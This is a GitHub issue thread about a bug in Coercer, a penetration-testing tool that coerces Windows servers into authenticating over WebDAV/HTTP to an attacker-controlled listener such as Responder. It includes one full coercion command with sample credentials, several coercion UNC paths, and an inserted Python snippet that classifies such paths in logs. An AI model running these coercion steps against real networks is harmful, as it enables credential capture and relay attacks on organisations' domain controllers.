p0dalirius / Coercer

A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 12 methods.
https://podalirius.net/
GNU General Public License v2.0
1.81k stars 182 forks

[bug] Coercing HTTP to SMB no longer available in version 2.1 #40

Closed jsdhasfedssad closed 1 year ago

jsdhasfedssad commented 1 year ago

Hi again!

You know I love your tool, but today when I was attempting to trigger HTTP to SMB authentication using the new version I noticed that the parameter "--webdav-host" no longer exists. I tried using the NetBIOS name of Responder as input to the parameter "--target", but that only triggered an SMB to SMB authentication.

Yes, the WebDAV role was installed on the target DC and the WebClient service was running.

Is there any way to trigger HTTP to SMB authentication in version 2.1? If not I am forced to go back to version 1.6.

Thanks!

p0dalirius commented 1 year ago

Hi!

Thanks for your feedback! It should work the same in 2.1-blackhat-edition, but indeed I saw some problems. I'm solving them right now.

One thing that I don't understand is why I don't get any HTTP authentications when using this path format (Webdav @ 80) through RPC: [image]

But when I paste it in explorer on my DC (Serv 2019, 10.0.17763.3287), it works absolutely fine: [image]

And in responder, I get: [image]

To be continued ==>

jsdhasfedssad commented 1 year ago

Something must have changed on your end between versions. Using Coercer 1.6 and the parameter "--webdav-host", coercing HTTP to SMB authentication works fine against the same DC, whereas using version 2.1 it does not.

p0dalirius commented 1 year ago

Yes, I rewrote the entire code base, so it might come from there. Can you clone the repo and try again from commit https://github.com/p0dalirius/Coercer/commit/6e4a814798167b1134c338867fc6ee9357ade73e?

With Coercer on one terminal, and responder on another terminal:

./Coercer.py coerce -u 'Podalirius' -p 'Coerce123!' -d "COERCE.local" --auth-type http --http-port 80

It calls the functions using \\WIN-A0AZERRE21@80/poc\File.txt so as far as I know, it should work perfectly for WebDAV.

Tell me if it works on your end 😊

jsdhasfedssad commented 1 year ago

I cloned main but this still does not work. I noticed that if the "-l" parameter is set to an IP, Coercer is using that as part of the "filename" as you call it in the output. That seems odd to me since one must use a NetBIOS name or a DNS name when coercing HTTP to SMB. I therefore changed the "-l" parameter to the NetBIOS name of Responder and then "filename" looks correct. However, coercing HTTP to SMB still does not work.

If I manually paste the "filename" "\\WIN-N1YL1EAJ63J@80/Fjb\File.txt" into Windows Explorer on the target DC, coercing HTTP to SMB works.

[image: coercer1]
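The thread turns on two details: the UNC path format (`\\HOST@80/share\File.txt` is handed to the WebDAV client, `\\HOST\share\File.txt` to plain SMB) and the observation that an IP address in the host part of a WebDAV-style path does not produce an HTTP authentication, whereas a NetBIOS or DNS name does. The following Python is an added example and not part of Coercer: it parses UNC paths found in tool output or log lines, classifies them as WebDAV or SMB, and flags the IP-literal case so a reviewer can see at a glance which paths are malformed for the intended transport. It assumes that the `@<port>` / `@SSL` host suffix is the Windows WebDAV redirector syntax; the sample lines are constructed, not real Coercer output.

```python
import ipaddress
import re
from dataclasses import dataclass, field
from typing import List, Optional

# UNC path with an optional WebDAV host suffix, e.g.
#   \\HOST@80/share\File.txt   (HTTP on port 80, the form discussed in the issue)
#   \\HOST@SSL\share\File.txt  (HTTPS; assumed here, not shown in the issue)
#   \\HOST\share\File.txt      (plain SMB)
# Assumption: "@<port>" / "@SSL" is the Windows WebDAV redirector host syntax.
_UNC_RE = re.compile(
    r"^\\\\(?P<host>[^\\/@]+)(?:@(?P<suffix>SSL|\d{1,5}))?[\\/](?P<rest>.+)$",
    re.IGNORECASE,
)

# Anything that looks like a UNC path inside a free-form line of text.
_CANDIDATE_RE = re.compile(r"\\\\[^\s\"']+")


@dataclass
class UncPath:
    raw: str
    host: str
    suffix: Optional[str]      # "80", "SSL", ... or None for plain SMB
    rest: str
    host_is_ip: bool
    transport: str             # "webdav" or "smb"
    notes: List[str] = field(default_factory=list)


def parse_unc(path: str) -> Optional[UncPath]:
    """Split a UNC path into host / WebDAV suffix / remainder, or None if not UNC."""
    m = _UNC_RE.match(path)
    if m is None:
        return None
    host = m.group("host")
    suffix = m.group("suffix")
    if suffix is not None:
        suffix = suffix.upper()
    try:
        ipaddress.ip_address(host)
        host_is_ip = True
    except ValueError:
        host_is_ip = False
    transport = "webdav" if suffix is not None else "smb"
    p = UncPath(path, host, suffix, m.group("rest"), host_is_ip, transport)
    if transport == "webdav" and host_is_ip:
        # The issue reports that an IP literal in the host part does not yield an
        # HTTP authentication; a NetBIOS or DNS name is needed for the WebDAV client.
        p.notes.append("webdav host is an IP literal; a NetBIOS/DNS name is expected")
    return p


def review_lines(lines: List[str]) -> List[UncPath]:
    """Extract and classify every UNC path found in tool output or log lines."""
    found: List[UncPath] = []
    for line in lines:
        for candidate in _CANDIDATE_RE.findall(line):
            parsed = parse_unc(candidate)
            if parsed is not None:
                found.append(parsed)
    return found


# Constructed sample lines (not real Coercer output): the first path is the one
# quoted in the issue, the other two swap in an IP listener for comparison.
SAMPLE_LINES = [
    r"[constructed] filename: \\WIN-A0AZERRE21@80/poc\File.txt",
    r"[constructed] filename: \\10.0.0.5@80/poc\File.txt",
    r"[constructed] filename: \\10.0.0.5\poc\File.txt",
]

if __name__ == "__main__":
    for p in review_lines(SAMPLE_LINES):
        flag = "; ".join(p.notes) if p.notes else "ok"
        print(f"{p.transport:6} host={p.host:16} suffix={p.suffix} -> {flag}")
```

Run it as a script to see the three sample paths classified; the middle one is the "-l set to an IP" situation described above and is the only one that gets a note. The same parser can be pointed at exported event or proxy logs to spot `@80`-style paths during a review.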

p0dalirius commented 1 year ago

Hi,

I've tested on the latest commit (https://github.com/p0dalirius/Coercer/commit/568358654dd3f21bc21130d2684718bad02cb55b at the time of writing) and coercing a remote machine to authenticate to HTTP through WebDAV works fine. However, in fuzz and scan modes, it does not connect back to Coercer. This is probably due to something missing in the name resolution.

Video: https://user-images.githubusercontent.com/79218792/206928514-997973d0-4c93-482d-82d3-636c18d209a8.mp4

I've opened an issue about this here: https://github.com/p0dalirius/Coercer/issues/42

Closing this issue and working on making Coercer detect HTTP authentications!

Best regards,